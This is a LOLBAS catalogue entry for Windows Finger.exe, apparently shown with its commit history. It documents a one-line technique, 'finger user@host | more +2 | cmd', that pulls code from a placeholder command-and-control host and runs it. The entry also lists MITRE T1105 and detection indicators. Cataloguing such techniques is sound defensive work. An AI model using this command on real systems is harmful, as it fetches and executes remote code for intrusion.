LOLBAS/yml/OSBinaries/Finger.yml

---
Name: Finger.exe
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Created: 2021-08-30
Commands:
  - Command: finger user@example.host.com | more +2 | cmd
    Description: Connects to "example.host.com" domain asking for the fake user "user" downloading as a result a malicious shellcode which is executed by cmd process.
    Usecase: Download malicious shellcode from Command & Control server.
    Category: Download
    Privileges: User
    MitreID: T1105
    MitreLink: https://attack.mitre.org/techniques/T1105
    OperatingSystem: From Windows Server 2008 and Windows 8
Full_Path:
  - Path: c:\windows\system32\finger.exe
  - Path: c:\windows\syswow64\finger.exe
Code_Sample: 
  - Code:
Detection: 
  - IOC: finger.exe spawn is not common in client systems.
  - IOC: finger.exe connecting to external resources.
Resources:
  - Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Acknowledgement:
  - Person: Ruben Revuelta (MAPFRE CERT)
    Handle: @rubn_RB
  - Person: Jose A. Jimenez (MAPFRE CERT)
    Handle: @Ocelotty6669
---
Update Finger.yml Fixed header and footer 2021-08-30 13:30:52 +02:00			`---`
Create Finger.exe 2021-08-30 13:16:08 +02:00			`Name: Finger.exe`
			`Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon`
			`Author: Ruben Revuelta`
			`Created: 2021-08-30`
			`Commands:`
			`- Command: finger user@example.host.com \| more +2 \| cmd`
			`Description: Connects to "example.host.com" domain asking for the fake user "user" downloading as a result a malicious shellcode which is executed by cmd process.`
			`Usecase: Download malicious shellcode from Command & Control server.`
			`Category: Download`
			`Privileges: User`
			`MitreID: T1105`
			`MitreLink: https://attack.mitre.org/techniques/T1105`
			`OperatingSystem: From Windows Server 2008 and Windows 8`
			`Full_Path:`
			`- Path: c:\windows\system32\finger.exe`
			`- Path: c:\windows\syswow64\finger.exe`
			`Code_Sample:`
			`- Code:`
			`Detection:`
			`- IOC: finger.exe spawn is not common in client systems.`
			`- IOC: finger.exe connecting to external resources.`
			`Resources:`
			`- Link: https://docs.microsoft.com/es-es/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)`
			`Acknowledgement:`
			`- Person: Ruben Revuelta (MAPFRE CERT)`
			`Handle: @rubn_RB`
			`- Person: Jose A. Jimenez (MAPFRE CERT)`
Update Finger.yml Fixed header and footer 2021-08-30 13:30:52 +02:00			`Handle: @Ocelotty6669`
			`---`